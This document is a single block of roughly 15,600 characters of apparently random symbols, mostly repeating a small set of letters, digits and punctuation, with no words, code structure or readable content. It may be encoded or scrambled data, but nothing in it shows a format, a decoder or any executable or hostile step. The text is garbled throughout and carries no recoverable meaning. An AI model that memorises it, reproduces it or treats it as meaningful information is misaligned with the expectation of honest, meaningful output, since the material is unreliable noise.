94)3^Ay^4^8Myy4eVBe^8Cn4yRtAy1DDRCC4Ms8AASyey^ACD.CAsss)RVVDeC84DR)yU<yD8CC.yRsyM<DVc<s.88^!ADeC44V.MyVs8AeV<^eCAADs.,.U4^s8.sDAsnVDACC.tR8y)esD;DCM{M44)y^))>y4VC.sMs.V.eR<R.4sMRTyyVs<.C<..yAyC)sV9<sM8A))MV^V<<.R^yV)AV<^RMC4Rs.)D-8^y^V.y.<8RyeeRV44AM4yDy^eMCDMy8yyC)RY)^sM^4esM)sAKDsD^<8.)R8y.^y<D.V.DADssDD^<^8444sy4vAOCDsC;4sR8V)UVVs<s.e8.ys))V44eMMA8SV).xA<DMA4seT)<<MDy4.4M))yR^yVA4)Me)Vyy^C<y<s8yRVq^)eCV^RRMsAsCFAa)..C.s^R4z^g4MR<ys4RVpAD<Vy.<MsA)s)VR-RMRCyy)s8BI>D^4CD.RRMA^<DMs<Ass860)^CD<488x8eseeD<<^yMD8.yDAWCC^4CD4DsMy)ZDDC<eyMRyxt^4V)<<.8R<yD^.VA.AMAyessDVU.MDMVy8RCV.e4M8<RsyyA1WD.D4...yA)yyDyVC4V844v)4)sCD^D4)4AA))^<C^V8^.y)4eee.<e<rs888eC)Z<C<RRy8<eR)^<eMMC)sMs^V ehCyCVRysVV^eCMV<RsMyAyCVAV<4.M.y^s^DC^yMV4&4Ds4ADeRDMC^yD)syA^sDR4)sC)Vy8^VVV4<RsA.y^D.Uy.RRV8DeCSytsDsC)RmR4y)F^D)<yyVR<s)))DD^RM)8Vss^DV..yMVyRsRVyc^.VCR4M)Ayd^)VyCV.A8AV<eVV.<y..8C1R))^e.AMDy4s.)s<R^M8..))AVM<^D4Cyss)<y.^VV44.RyARyMD.h).AR<48e4weGV^.CV.8RCAD<VDA4)syR4VV)uCe448e8)sw)DV84.M<4Rse)R>4.AMVsDRe)^<DD)4e.M)Cey))D<^)MM8DseD)C..qMCACes).<R^88)sDAyAA<D^^<e4D).y8^4MV<<MRAA)8D)C.M)MA4AspVDVV^VM<sMR)A<m8^<CDy.RRy<e<D4^O.<8.yV^4V44DRR43sM)sVM^<R84AA))^<CDe8..^)CyM^.V44ysD8s-.V)VMM)MeA4s4V<t<M<RD.eeVAM<CCy<)4<8)yMeDVe4).RAeeMeCVC<48R8Ds4)AV4^MRsRsAwD<<AMR8^4Cs4yy_4C^<s.VRMAV)eM<<.MV8VyCAAVV^<C)ACRoVe<DMs8<yDRDA4eDVR<M.^)Ds4D)C..(CRA.eAeAC^CsRVy4eVVR<4CeC).)sV ^esDVCM4V8eV<e.VV<V.C4AyV)<G)4CM^yeeDVs<<.DC4.)s^A)ey.V.VRMR.}.)CC.MVMRs8A<V8VV^.My8.sCDRD^CeCq8^)e;4^DMD4<RsA.:CDy<e44.Ay4sz)MVs<MM<A8sC7)Ye<DR<8CyMA8eVDR<4sD)yARDCVA<^.4R^yV^MDsMsMy8eNVee^lDP8.44)D9ed<M<4Ay<sDeAeCVs<B.s88B)VD<^<<..A^eyDResDD8As8)Mao^CCA4.s.A8O<^8MDC.RD8Rs_eCV ^)s^8R)4)8Vy.)CsyDA<A8D4DsM4yMs<eee.VACD.A8sb9e^<C<M.8AMyxAR<VC4Cs.)s4uDe4MNM^R)RMyywVDy<Rse4ee<eCD44<RAy.e.V,<CM88Ms))4VV<D.C88y4)^y<DnCC8..<8Fy.eMVV4AMv8)s<^VV.^<M84R)>DC<.M:884)A8AVe.DyC..C)Ry4VeVHC^ReA4e4VF<MM?8MyV)sne^yMA8{y<e^))V<^s^AsVACg^DAC<.4R^yeeCAA<R.<8yyC))t.<VMR8DsM)^f)^VCe4^R)As)8Dy<7.sR4ADe8VA<R.C8yyM)RVC<VM8MVsyAGAR^.Ck.DsDAMy*DAC.<DR4yAsAD^<R<)8)y4A4VR^yMs4eR8).)8^4CyCMs<8yZCD8<^.aR4yyesD^V).M8s4^eDV)<.MkR.4VsVDDe<^^C<.D)Aze^4MVCMRV88see<Ve^AsD4y).)4Vs..4usR)R(y^CCA4MRe).AyD.Ve<C.RRCy^^4VVMAM)y)AM)se>Ds8Ds)s<VDeMCsC^.8R)A8e.My<.RVRDiDeCVR^R8)y.sDV<Ty^DM.8DR(DCVyCRCs4))RV^DeCs4^RyA^eRDVCV.CR4AseeD)VM^^CA4VR8)CHVD<MD.MsDARe8D88.R^)8s.A)MD4<RAAMysVMO)^<M88<sDD.eRCyCA4P)yVC^DCA4VRsA<eyDC<e4Vs<A4>.)ehy^MMR8CRsD4eR^8<=yyRAA8eCDs8.s8)DvseZ<s<^M88)y8).Cy^<8V8DyCDV^AMs4As.AA_R^DCe8V4MAVy8)eD<<eMA)D)CV.V4<sR.ya)yVV^AMR8^s8)<ge^CMC84sy)sAee)Vy<CMV)^sK)yV^<DCAA8seAyVV^DR<yM)eV4YAC4<Z.MRsAMe<M8Me8)8eAD^<V4^^C8RCyyAM<<DA<ey)sy,.eeDCCR4CR^V4V^<A<)4V)^)Ve<<4<DCARVReVMeyDsRM8<AeA.eA^DCA.s)f)DDCDMC8sCADe8Ve<8.C8yy<)yVM<)<^4)4MRy)VnyDR8e8^A<AC{4M<4^RCAVe4DM<e..8)y4eAeD^A^CCs4bssA8<)CM4^4<s.V^^yMR^sRyA4eRVeCs<MCm4{y<Ay+_^^CAyy)eV4<VMe<e4C8ey.e^VE8.R8A8esVUVe^e.DAMebD4eA.488yC)yVD^AMD4esR)^V<^A^D.A.C8sy}esV84)4<y^y<e.C^MG8<sj)s(e^WM^4+sM)y)VDyD<<R.eRRy4^AVY^RMR8)sM)R%A^.R)s^e4Vs<<MA8s4VR.Ay3.DC8RMpye-A)^;R4.8)8MsyeVVy^RRe8^)<DDe4Ve8ys^RsAV1M^V<ey<yse8^.dA^<sVy4yM)M{y4.Mssys^VeVV.CCRyM)sA^^)DC8y4V8eV.V)D)<A.)y.)8D)CMMAMy4yseVVmeDeCCy+R.#CeyM4CRs)R^He^<Vy4.M))CyR)4C7^AM^84y^)VCMDy4s44eDA.<^CRCC4V)4yM^ADC..8=8CKM)<V8<CMCAys8AeV<^eCAADRev.-<M)C^seAMACm4VRC4RVAey<As<C^yRsyDyV)^1C^yMV4Ae<AD<8^V4^RyR.VD)%DCCV.V)4sReDVR^5M#AMs^A)=<^ARD4BR)DM9^D8C)48R.VyQ<CVC<s48A*8V,V4^).^8)sy^V+MMMM8yAsDV)^CDAC^44s^AV<MDy.s.^yey.)ADD<AMsAny4VCC^^3RC4De^AR<C<y8RyD)Aes-8VI49s8A_A^DDVR^F.C8!s)^^QQM4MRyeRyVA}yMeM7y<AsA^e8D)C8..)yyVDVCe44Ry8<IDeMV8.)CsyysVDV<RMVCy44)eA<DyCC<yss88y)eRVR8V.V8AT<e<<VMRMVy R))^>eDeRM4RsAye-ACM<CsA8RmAeVCP...88Dy4eCV<MAMy4)Rd).CC^D4R4DA)AeD)DC4D4VRVA<DMDC<.M88kyCeVC4^A8Cs)A<D<bD^.M^4^eRA)VVD^MVRR)4A4DC<)<Cs<RCyVe<C8^MR8A<s.Ven4..8Q4^R8Vye8My8..8)Dys^RM^.R.y8Cyse4V.M;Me4eyDV<Qy^DM.8DR_DCoDCRMVyV8)Uee4C+^OsMA)r8e.C44<.<yeeecAVs<ARDyse<ts1R^A<e4AAMy_^5V9.RR^8RVDeRVM<8sM44e )CCV^<CRACsDD.w)D.CA4RR8,DGVDVC<RMRCy.)8VQ<C.VA4sMDAVCM.4;sCeMA<w8^CCCyy8)AMe)D<C<sR8.yD)4DV4M.<8DNR).IA<DMA4seQAA^C^48y4V)A=<+^^M<44MyesA^MVD4<MCAMs.D8VV.8MVye)MAM^MD48R4DAyA)e.DACR.8ADAVeVD<.M.C8.s8)kVC<VR44MeA)C^.C0C4yMR<A8aCDC8yM)RMy)e<D<4RM.8Ds4eVCM<<MDARs.AAVD^ACsyFsMIC14MyCVsAA<yeesMD<F8ey4seD)my<VMA4AO<)4VsDAMss<eDVy<CMy4^4C8)A<SVV-.8.484ysVAV4<<Rs88).ey<)DyMV4ARAD<QVD.Cy4.RCVRe<Cj<yRVAeZ8^DC8.eRy4Ce)AR<yDA8).eeV)D<VD88.s}A.y.D.V84s.yyAys)sVV4yM!yVs8D<CM^88e4MeA)DeN.4CC.sRcAse8M)CDR^R4ERe<Cy^CR)8Mey)y<)^)R^yyeDAs<.C)CMR)ReV4)AC<<8R<8shCD)VAC^.DR^)))A*A^+8D8Vy<AMV<CAC<sVRQADe<Ds88.M8yAVeyVR4eMRACssVMC<.)R.y)e<DVe.^<8y.4)Rys^yVA4e.QAey.^CcR4.8)4)))AHCD<^8<8DsDA4C^DA8848e.A.es.DM^sy8),AesV88VM)8<y8e<VD4.MssyyVD^me.VCRyMAAACDAD)8.MyA^y8D^Vs4<RA8yADeVDDMAMy4yseVVag<^CC8^AyA<D#De<e4DA<AM)eDCCD.VyRy8)8VyM)MA4esV)4CM^RMA.esAmMe)DyCDy.Rsyse)<x<eMeRDe<)yVD<..D4!OCAR^R^ARV4MeDI8(.D.<Ay4RyeAe<C?<VsV88F<)sMD<.MCAAs^e<V^<<4AysRVy4<CCyCs.sR)e0e)V)<<se8Ve<)sC.^4R449es)DC8^)CyA<sVA.Fy^.CCyR8eeeeyMM<ss.y)y8eCCy^8C4yDs8D4LM^sM.4.e)A^^^DC8C.AA8AVe.DyC..C)RADDzjA4DMDA<s8DMVC.4MMs8RUVyvDM)C<s%RMVDe4M<<RR.8eyCeRDC<^s488)A)eC<^VRD48e<).<8C7Cs4.))A.DsC<.CsR84yAe8V84c.^yC ^)DCC^RRMye)M)8^M.<MDyMRsV.^tC.<MR.)Cy<^.Vy44sVy4s<V4CM^)R44Ae8DD^8DA48y.8Ay<<VC4CM.M8yV.es<y<<Re4e;V)4Ce<<MDARs^eVK}<V4Ry48)).ey^..E.A).yy^4C)C4M)R4eV)CC4^AR8.)esVDVV^VM<sMsCA.e8DKCC4V)4AVDC<)<Cs<8Dy.e^V^4RMAseeAAy<e^<8}y8Ah)^D{M)<As6RCVV^RCV^lRVAes)^VVM4DRsyDR)VD<q^4RD4.e^Vy^^^DC<.MRAADe)MC<)RDysye^Vje<<M?4Q9.)R^y.RC8yysVVA<MCACURA8w)V^ADs4e.<Ac>8e)<8^488A.sMD8;).RR^sRRM?R<4DW8R.e)sV<DsDR<yM)RCyReMCA<M8Ry^ssD8i.^yM444ee)D^<.DCVy<R8VC^)CCC4RC)^AV^CVR4MReyMsDVMC<^yRM4se.Vj^.^MC4.RsVAMpDM8CDRMyey4^CV^<4.<8<9s)eVV^^MR4essDDisCe44Rs))yy_VDA<Ay<R.e8^.VM48M)ARk^VRVAMRCA8)eR)4<y^V8AyMssuMeDCM8<.y)Mys^.Cz...M8My8VsVM<DR88MesA4<8C88sRs),fCD)DM8<.DR.A^e^MRCD8e8+A^eMD^M)MA4AsWVD%A^88_4AeDye^7D48D.R).eyDCVA4sM88)yR)RMV^C8M8.yRA8VRMCM<4<s.,8><DE8.4<)8yM^.<M4884A)e^VyV<4DC_8CyV)VC4^R4A.>yV)D<MDs8.4yA.AMe4VRCVseRVe<).D4^CRR4-yRVCV<^<M.s8s<AI<.^<88.M).es^8<A4)R^yyy<^DdH<C.V8V/4)s^A^).V4eyVmy*sDsC)RZRsA.^)Ds4_MAA))RDQ^y4C8Ry^ssD80.^yM444eeA4^<.D<4Me)yn^IVDV<.yDRMe.)eCR<MRbA4e))CCy<VCeA.RS))jA^)4.4R))VMDADy<y.eAVyT)ND^.CMA8^y4e^VV4MMRssR))eey^e4R48symy^DMD4.sDACX4DACD.yRDyRe8DC<...8eyCyC{)*)MDMV8<eVAAD.DM<MM)s8eDuAVM4s.)y.sCVsVR<ARRRyReVyVy^V8DRMeD)CD)DA4D4Vs<,sDsCC.yR.y;e.D8<s.888yMe^VM<<Ms8M8<AAA^^VD M^8<s^eydV<S<e4D)<s3)4D)^V4R8My)AyVV.)MysCRMm804D4CsRARyyyeeCV<8MeR<ye)AMD^A8.8<e))^<eMMC)4<s8)<ID..C<Ry81V^e4M<.sMAR^sA)CVV^)RA4^yyD8DVD)8<yVR4VeVDCsCyRes4IR^^C4.dR4AV_<D<<y.CRCyReMV)<^My8^s)yV{RD)C)M.sCAeYMD)Ce4Cs^AReyD8<A.C8cyReCV8<R<.4Q44)<)A<<<^MMReRMx^YyM)<.MsACeD^sD8.DMyyMye^VG<^RCeReseA4Is.8M.RfR^x<)sM4.e.)8)AVD^VC<sMC4As8)MCCMDR.yRe^Vy<R.^4R48R8AyD)DM<y4VRyyR^eDD^yMy8>s4)ybe^8Rp48eR)M<4^V8R4s)yV^^yMC8^.88eA<eeVA8DM8y.y4esC4^MCRy<)VDCV4M^Cs4VsM)Vee.<CyR8RRAA^e^D^eRCADs8^CD^M)MM4yyV)y=R.e4Cs<sC)4^RM^44RTA4lV^<C<.yRCACeRDM<).^8yy^))eV^y^<CR4esRA4<A^^4D4^sM5<D)CC.AR)A<3DD8<s.48yy<)eV8<<M4888M)VA8ee^<Ce.AeDA<D.D8Css4Rye1D4CD< R<yAeCe<^xM8Mess)M)R^)M4484))DxyDAM.CRRC8Ay^e4D^<VsM4R)s)yVe4VC<4RReeeGeD4Csy8s.(DeRVqCC.k8)V^e.<4.)8y4)y<A)FM^DCey)s8A^d^^.<e4^RMyQ^eMD4ss<)Dy4))D^<)My)Vs.VM<e.A8Ay))CAAT^^4M^4VeMy.DsVM^AR48byMesDM<<s88M))Dy<sMA8AyM)yV8^AM^4 yCAyA<eRDeCR.4)AyADDMM<DMRR7s^#yV4<xC)8^e;z z4D)M^4)RyDVD8CM8R4VysyR)RVDCA8MsVsR^<<<^yMD8.yDAnCCDh4Rsy)DVD^.MD4Cs4AASDDyCD.RR8ACe.D.<e.C8.4esC)RVC^^R44CAAVM^MCZ4.sDAsFD^<CM4<R<AVe)DV<e.MRVyVs8AeV<^eCAADRe6.<CVs<DseAMy)e<D8C<.D).y<Vy#.D)888Vs.)yV.^CRR.eAeQ)^4MM4.s4A8epe4V)C^.)8yVVeD<M4<.>AMA)D<<s.<8Ays)%VC<MCACC.sRTAse8M)<4R^).)<).C<C<M8yRA)De^e^.CA8DsAAs<;C<4Cy^8YyseVDR4eRM8)y<e8D<<Ds.4s)yAAVa^eMvsss^A8P)^8C.yyy*PV)yMD4ss<4)e8eVV.<y..8CaR))^e^)R)8MsD)CCDMRR<.)R<Ve^4CMC<.<8RVCe8<R.qRA8Ree)eCA<DC-A4s4)<<s^.4.sVs<V.eCDRCM.M)As)a<D^4<..RM)e9/D^<DRCy4yC,>de^VC^4Re4ACfeD)CeR4y8AyesC)4V.)y8y4)4VsMAMy4yseVVT8DeM<4eRADDY^C.CCs8Ry}AD6<e<V..8Cy8eMNy48MM4yyV)yGR.eM^s<RC?4eNDMCs4MR<V8ee<)<e4DyCADVAByMAM)RVsMeV^y^.M^yRs4 4D!M<4ese8AADe)V)8C.CRVo4eM<MM)8sA<sD).V^^^RR4RsMVA/sCs4^sC)8y.eyD4<4se8eys^DVmMc84yAe)AyVV^ACAA<s<AZ<.^C4<RA)^V^eVDMCD.D)8yM)yDV<yMRAesRV<VC<4C)84)^AsVCDsMCy^R)VCeRM^<RsMA80.e.DR^R.RA.enV.VC^CCsAMsRUs+^Me8DsOR^V)/^DV88.MRqyee&<8<VMe8C)e))Z)<V8^8Ds<AMlA^DC)yCs^O^DsC>8VMeR<yL)-M.<<.)8AyX)MVw<8.<8.yM)CV4D4M48VsRG^eA^.CM48R<A8tD<A<yMy8eeV)_VD^<Ms4QsyD^VVMV48sA)eyA*DD)<)yCRDAyesD)<<.)R.)neCD<<^.M4MyM)e^R^84R4ss)A^h)C8CV4sRRAAe^DACM8eR<A^eDDC^C.C8))8)4^8^RMA4DsA*4eJ^RC84yRDAyZC<)C^4DRVA<)<D<<A848.)4)8Vy^VMys.Re)8_4^sCV4ss<eA}D^V<&4^8^A^ey<.<M8.84ysAwVsMMC)84s.)Red^RM^RysVAWee^D<D4DRseMeC<M<..R4eyRVC:A<.MM88Re)8VDCsCQ4eR))VeV^VCRRCR<eCeMD8^).8y<syeMVC<4C)84yV&ROe^)CA4Q8PA!X8C<C^R<RCA4)AD4.^MsRCy<e.bA<.M9s8s))Aby^e<e4es4Y^7DC^C<4.8yA.DDVRC<.^RMsyeMVeM4MA8yss))e)^)M.sDsV&Dt^^M<s4MAVy8=^DDCCMsRCy)V.Vy<sMR8ARA)AVMMVCdsVsD)CeR^C.G.4sDAVL<VRC<.AyMyseRV8<yCy8yyCZB#eC%MV8<R8)<DeD.MV.Js^y8t^Dy.C.RR8y4esGs<s.<ses)ue*,<^C48^A)AMl DeMD.4sDAsD<D8C4..RRsReRD^M)MAs)seeDO.<D4A4CseA)VVD.MV4RA^A4#.DMC8M8R8ADVAVyMAM)RVsMeV^y^<M)4As9AM;w^84D4.sMAC64V4C44VyyysVyVA<rMC8B)s)^VA^yMe4Cse)4^V^MMC4<s.y.7.Db.s.RysyyeeV<<e8R8Dyy)sV)^<M)8.A5)CV<^^MM.MsMAeDRD8.R.sR)y^e)<8<V.s8RyA)^VA<M4e8<y^)DVCDCMC4)A8A4D8DRCA.DRAe4)5DR<8.y8DyyeC^)<^.D8Vy<A<V<^A444.A4A8%yDVCyR.RMe.e4Ds^1.syMyC).%8^&MC8Ve4)M^<M48s.8R)AReR.V<).<R8A<eDM.^y8y8Ay&AIV1MsM^48s))8K..yCMsVRs)CeC^C.u.)8)y<^eD^.<MMA4esD8V8<yM.8ys)AyC<D)48.P)RV^e)^4C.44A^ADeDDC..MeR8y4esVV<s.<sAs<VVS!^DC<4sR3Ay<^^V4VsD)My<e8DC<Csy88A^eDDC^s.C8)eyD<^s^RCR4AAeA)eSDDC8.)RRVVee<e..R.AAss)oVy^ys^8^seDMV<MD8<y8R.Ayb4D48e.ysMAC/4V)C44VyRy<e)VA<vC*8_y8V<V^M<MC84RA)4^^DsMC4<s.yAi.Dq.8.)RAyyee_e<e.4y^yDV^V<<.Cy8.)DARV<^^MM.ysMAeD4DRCy.eR)yAeK (<1.8RD)A)y^A^).V4MyV+yu<^)CA4>RMAYh8CDC<4MR8A4e.DR^R.RR^yyV.VMM.M48sRS)s^MD)M44.sRy* R^^.y.MRKyecDVDCD.sRMy8e4V.<RMC8Ry^)y^.^M4.44ssy=vsCM<)44R.AR)cDRC^8yRVy>)eDD^D.D8s)M)C^M^.MR.esRFCeA^.CM488eA8=D<s4)M)R4y.eR R<R.^s)sAh)xe<DC.8DAAACesD>Cs.8))A<D^D<C.MAR.eD)RD<<C.<sAs.eVVD<V8e4ReVAM^e^V8DsC)^A^TMVMCMs^Aye^eVVV^.sD8M).)R<sM)8y.eeRAeeA.CCD4yRsAyDCVA<s.VysyR)RVAMeM)ses*e^!4<^4)4Ms*AeVDD4MD4sA<y)B4D.CRMRRRA^e)VM<IMeRDsAeDVs<<4e4)AeAzV^D4M^R)RMyy*VDy<RseRCe<eCD4^).4y^sseCVM<C4)44yD)^VDMXCC4eRiVV^<^V4)RCR^y^)8M<<4888yeAVp<)^VRy8VReD./<^)CA4)A.yeeAD^.A.y8yyeDVV:.V.DRCsReC^Y^4.D8Vy<ARV<^A4M4ssRA8hyVyCy4CynyeVkDVC<M8R<)e).6A<DMA4sev)M^C^MM8.8s8q<eyDDC.4D8uVCeA<R<<.)8ey)V8V.^.CAA4syZAG3.V8<yDsD)Ce;^CC..C)AACDDD.4^Ry8.AV) DVMyMs4ss)I&O4<DMV8<RR)<hACMCsRRR8eResD)<^.)y8yV).Vy<.MCARsC-edF<^C88^A)AM}PDMC}s)R8m5eCC)<CsVA</DeDDC^C.CADesVD!dD CMAVsCdMe)MR4Ass8)V8e)Vy8<.VRsyRes<<^yMR4n)R)8t8^y4)4AA)AeVDD.MDRARyeAe)^V<M4Vyyys)A1e<MMs8.e))y^yMsRV.es<Ane-..C<4)RAAXeMDkC8RDR.AMeCD4^4.4RV)y)s^y^AMJ4Cs#*sk^^ACy4eRCAe+4CVCM4CR<A.).D.</8s8R)s)yVe^<MesRsDA4jA^4CMyssVeN{V^<<R4<yey.NVDDCV8R8<y))eV).yM.y)s^Vy0)Me8DsPRx)^e^^^4ns8ydy)))V<4e.^y<y.D4<s.8CyA.syARCDDeM844s8{DeRD4<)R4R.y.eR<y<s8y8Ayu)CV7MsM^8Asy)e,C^eM48^sM)Cc<^.<.4.R A8DDVyCM.CR4y^e4DVMyMssysA)ojC^F4s4^sAAy&eDCCe44AVA^uCD4C..MR8s8e8DD<s8M8C)M).VRDeMRsCRA).cM^8<e48sDeselDe<)4V8VAVeR<C<<8C8My8A)V8M<Cy4Ds.)De*.CCsRRRsA)e<D).8.VRsyyesC8^).4yseR)sVR..4)4yRyAD<A^V4D4C)Cy4<^D4<Ms)8sACe<DCM)MM8<sRV<V^^^MMs4s.,4K8^yCV4yA.yeS8D4Cs.VRsA<VAVeCV.<R^yDeCqC<CM)8.)D)V^D^^MM.ssMdVe8^^CD4C8sACe)<.<V.s8RyAAAVA<M.V8<y^)DVCDXMC4)s.>DmVCDC^4M8sAMDVV8C^.DRCsseCV)M.MV8ssR)AeA^AMM8Vs<)^nD^C<w4CR)A.DDDV.D.^RMsseM<V^8.^8DyCAsVC^)4.4VssAR?AVACA4MsVA<F^DDCCMNRCy)e.<D<V8D8^yMAsVMMVC88^sD)Ces^CC)R.RVAseRDA^A.ARMAVe<D^<D.C4ryC))V.MDMVsDs^)Mes^M4V.8s^AD9CVsCC.)R8yyesVR<ACA8AyM)e^4^AMy4ss)A8?)^.4D4VADA^+MVsCMRV88A^eDDC^s.C8)).)8Vs^)MA4yseyeSe^4MVRyRseyeAD}<C.9ysy^eAVy<eMC8ey4VVjs<CM<8.R.).-z^sC)4ARyAeeRDeC44VyyysVyVA<#MC8d)s)^VA^yMe4Cse)4^VDsMC4<s.y.k.DnCs.)RAyyeeVR<e.4RV)y)s^y^AMX4CskWsH^^ACy4eRCAeW4CV<Rs4A.eADCCs.D.VyDy^eM3s<M8V48y^)DVCDsMC4)A.AV(sDRCAMARAAM:VD<C^.DRCsweCV)<.8D8V)D)^VMDsMMsVR8)^xD^C<s4CR)A8eVDs<R.A4AyAeMVeM4MA8yss))Q8^)M.sDsV3D?^^M<s4MAVy8v^DDCCMsRCy)V.VV<sMR8ARA)AVM<VM<8^sD)CeT^CC)4.ADAVDDD^CMMsRMeV)8D^<D.C4syC))^.^VMs4RsAyA+A^MMV.8s^AD:CVpCC.)R.eDeV<D<^.M4syMVV?gMVMD8CRR)CD5De<e4DA<A^eCV.<).^8etMe<<<My8sADR{)CVV^VR44CRsA1UsD88).^A^VVE^CR4<R<AAe<DrVs^CMC88sV)CF4^DRVy8ReAC9R^CC^y4R^eAe)^V<.4Vyyy<e)V<<)Ry8VysV)<A^^MAyR)VAeeeDC8j4<ACyA^4Vs8M.s88VV))D4<..4yVs8).?AM.MM4Ms8/s6RCsCy4eR<AeDRD8<8.yAhs.A)<8<4888RyA)DVAM4M.48Rs)Dh.^^8R44AMiC^AVs<,.y8yV^)UDR<8.y8DyyeC^)^.RC8Vy<A<V<.V444.A4A8gyDVCyR.8eA8e4Ds<V.sR<)AeDDV^J.^4^y^)y^.^M4.44ssy}isCM<)44R.AR);DRC^8yRVyv)eDD^D.D8s)M)C^M^.MR.esRzCeA^.CM488eA8HD<s<t.e8)AV)VDV<R8C8<)C)MV8D)M8s<Ry)MNC^4<)44sVeReeD)<A.+49yce8<<<^8<8Cy4AAV4M^Cs8Cs<).eA^.CNR8R)AAeyDe^e.eR4e^eD<^<<..4yy.VDKR<<M^8MRy)M:eC4CA4yRsA)))D)C.RDRVeDe^DM^s.MyVs8e^VD<CCs8Cs)c.Iy^sCR4A8AAAzMCV<mRVRDAC)RDCM9M4RDyVe< R<<MAsMss)R{8^y<y4ysCeoee<-CV4<88A<VeV.CVM-R^s8e^VyMCMR88s4)ses^sM<ReR)eeeG^^<44^y)yMeGVeCDM4RDysV<V8<4M.8RRR)RV^C)CAR)Re)De.^D.A.CRey);VV.CV.Ry^y4e.VM<8C888yDTAwyCAC)8VRM)VDyD<C).ARfyMe/D8.D..RMyCe4W4<4.Vsyss#yrA^bCC4-AsA^iADyCe.CReA4DVDMCC.<R.s.e.VIMsMRsssy)eB<^e4R4DsyAs{)D<C)4.ydACm<D^CMMMRMyeVRV8MRMs8)s^))^8^VMs4RsAA^*A^M.e4<s^AD CVCCC.)y8y4V8VR<AMD8A)4A*VR^8My4Dsy)CD)^^MD4Vs<y<1<DA.4..y4y8eyVV<y8.4ey8)4Vs^VMs8<AA)DVVDkM^.^s^AyD.DM...4Rss9es<M^).48.yRA{VR<^4y8Vs!AeVDDDMD4sAMACDMD.CRMeRReC)AD.<M.84ey8eD^s^_Me4)yVAVVV^R4C4<ACAMO8V)C8R<8yAMeCD4^).4RV)R)eV)^AMm.fsX)8^<^^4<4Cs4yAN4C^<s4CR<A.)AD.<a888)yA)yVeDeMe84)^)D^^^<M..ys.qDeR^<C^4M8yAMee<4<A.y8sy)A)V)<.8D8V)D)^VMDsMMsVR8)^+D^C<s4CR)e.eyDs<R.A4AyAeM<V^N8V8DyCARVCCFC48DsV)<eR^<CARMRsARe8Dy^y.yRC)X)e^J<V.<48y<Eeg.<VC#8^R8)^%yCCCR48R4As)sDsC<8e8))e)QD^^4.^s)sM)KUe<DC48Dssz<(8^4C.4R8RAR_^<)<A8)8eAD).DDMAMC8es)eVo.<VMRs^s4).XM^8<848sDeAey<A<)4V8MAVVyV<<)MA8YsM)aV8MDM.8MsC)4e4^4MVRyRseyeAD-<C. ysy^eAVy<eMC8ey4VVVM<CM<8.R.).JbCsCRRsRyAee<De.R.8yRyse)V^<)8884sRAyV^^4M<yss8*8^CM)<y4VRAyA<<V4.8.RRAsAeA<4<.M.8R)y)sLADeMM4ss.V)cyCy4<s8AeV^eVDMCD.D)8y8eCCy<R8RyDe.VWCVDeM<4gR1D.G.^^8R44A.eW^CCe4eMARDy)))MC<88R8sy))^V)M8MV4.sy).XC.R<eReRP)^e8^^.)Mey)s6^DV)4DR.yMy<)<+R4CM8sR);VAhR.sCF.)eMA^(AVA4e.)Ree4)MDy<s.yy.yM)MV8MsM848ReDRn)CeCDy^)MV<e..DC..C)AyR_<D^C<8A8Cy^)8<^<DMD8C).)M^.^4Ms.:sskMe)D<C84<RDV.eD<y<A.&8MyIVsVs^8sV44s)A4enDyC8yns^VReeM4<esR8y3eDMDC<C.4yRy8VRVs<)M^8))8)4^8^RMA4DsA/4k.D8<s4DR.A^^RD4.48GACe)DeoA<DM)4)bC)DW4^AM44MesAMDw^VM<.Rs<eee.VACD.A8sude4<C^e.84eesVAVsMMC)4<s8)<!D..CVRyRMAqeMDl4s.)yAyCeeVC<e844e)y).V^.RMRsM)AVAesD1Cy.ye^A^eeMM<4R<yyyMe0VM4DRCRDeeAAVD^)C)ACR8}Rus^)<)4)A8AV;sDV4AR)RAeM)A<R<8M88y)))A}e^VM44As8V:gDCy4M.6sRy?^yCeCys88.yye4V44eM^y<yCe4#4<48^4syCAs<.M4M.R5R.Z<{^D^CMR4R.y.eR<y<sMA4eyM)sV..)Mysy)<V8<V.^CV4MsDAD<8D)<yy<8sAV)sV^^eMyy4y.).VRMyMs4ARe)Mts^.8)4yAR1x^.MR<4.AR8y8^JVA<^.4R^yV^MVyMsMy8esC)e^R^DC44As4AM<sDc.u.Rs<A^:MVMCM.eyRyDeyVA.)RV8)).)8^s^^MA4)sAmME4^RCA4yRsA)e8D)C..&ysyRVsVy<eM<8e)R)DVy^sM)4<s)).D0^CM<4^sMyMhMDe.R.8yRyse)V^<)888Vys)RVA^^MA8MAeA4<MMC4ss^)8efee<9CV4<88A<VeV.CVM,R^s8e^Vy<.MR88s4)ses^sM<4AAMAsJRD8Cy..RyACVXVeMI.VR<s8e<^e^..V4Iy^A8V^^yM.4Rs8A4HsVsCs4<RAeMesDR<8.y8.yyeC^b^e4_8Vy<A8V<CeC.8VR7)^e8^^Cy4.RRA8e4Ds^s.sR<yAVMVs<RM88ys.)yVCC7CeR(sV)<e8^<.e..8AADeAVs4GMsyCyMe8Qe<88<4yyMAyVM.<CeyMRsV<esM.4Rs4R4As)sDs44sVy4yM)Mry4.Mssys<V:<^.VC<yes<AD<RD.MV.6sVeReDVa<M8K8eseeD<<<^8<8Cy4AAV4M^MDs^s<).ey^.4D4VR^yCeyDV<As<RDeDDM<y.OC)8^seAeCM^^MA4yseACTe^44V4MsCA<d.V.C..qysyRVsVy<eM<8e)R)DVy^sM)4<s)).D(^CM<4^sMyM_MDe.R.8yRyse)V^<)888Vys)RVA^^MA8MAe)<V^^DMC.CsCA)D8D4.8.RRAyDeA<4^v.R88yy)DVy<C4)8^yD)VV<D<M<4AA4A.D4D8Cy.VRye.)eD8<4.s8Vyse<^A<D.V4,y^A^V^^y4.4MA.A4hsVJCsRM8)A4e.DR^O.RR^)yeVVq^e.D4DyD)s^M^C4M4.sRyetRCC<A4.RMA8)eD8CD8s8_ye))DV^V.V8R)C)<^C^MM8.)s8J<ey^MCC448)A4-V<R<e.)8AyaAEV6<88<8^)<)CV4DAM4s^Rs)Cn<^.<A4.ROe8e)DA<y.e4eyee4<^<D8^8<y.AyV.MDCR8<s^)Mey^MCeR4RAAyesD)^).)R.eDeV<D<^.M4syMVV58<^MD8CRs)CI)C.Cy4sRRAA)ADACMRV8QeVeDDC^R.Cs,s4eDVV<<CR8<sAhM%s^RC84y8yAy!C<_<e8(RVA<)8D<MeM.RVsWe^b8<^MysCsR)8E4^s<s4ss<eee)<e<m4^84A^V)VM<_MeRDs4eDVsM<M884s.)ReR^RM^R)RAe)ee^D<.4DyAyCeeV)CVM.RVyRV^V4<.MM88R8)8VDCACyRAR))VeM^V.y.<R)yAe(VM<&.8